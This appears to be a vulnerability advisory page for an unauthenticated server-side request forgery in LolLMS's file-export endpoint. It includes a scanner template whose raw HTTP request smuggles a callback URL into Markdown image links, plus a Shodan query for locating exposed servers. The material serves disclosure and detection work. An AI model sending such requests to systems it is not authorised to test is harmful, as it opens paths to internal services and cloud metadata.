CVE-2026-0560: LolLMS < 2.2.0 - Server-Side Request Forgery

2026-05-09 LolLMS PoC Public

Description

A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.

PoC

id: CVE-2026-0560

info:
  name: LolLMS < 2.2.0 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.
  impact: |
    Attackers can access internal network services, cloud metadata, and potentially execute remote code.
  remediation: |
    Update to version 2.2.0 or later.
  reference:
    - https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0560
    - https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-0560
    epss-score: 0.01765
    epss-percentile: 0.7736
    cwe-id: CWE-918
  metadata:
    verified: false
    max-request: 1
    vendor: parisneo
    product: lollms
    shodan-query: http.title:"lollms"
  tags: cve,cve2026,ssrf,lollms,oast

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "LolLMS"
        internal: true
        case-insensitive: false

  - raw:
      - |
        POST /api/files/export-content HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"markdown_text":"# SSRF Test\n\n![ssrf](http://{{interactsh-url}}/ssrf-probe)\n","output_format":"docx"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a75a73de8a9d0589b0c5cde1c883a24e43941a9b180cba293b9532f1deada3520220175c910190417a4698fe6bf4cd771e3a27bb42c7d20ea14cf96b2a36ed259716:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities